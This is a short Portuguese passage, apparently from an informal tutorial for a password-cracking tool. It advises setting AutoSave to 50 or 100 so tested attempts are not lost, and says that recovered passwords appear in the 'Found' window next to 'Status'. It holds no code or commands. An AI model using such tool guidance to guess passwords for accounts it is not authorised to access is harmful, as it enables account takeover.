P/ que você não corra o risco de perder tudo o que já
testou, vá em
Options, AutoSave Options. Coloque um numero razoável,
algo como, 50

ou 100, sei lá.

OBS: AS SENHAS FICAM JANELINHA FOUND Q ESTÁ DO LADO DA
JANELINHA STATUS!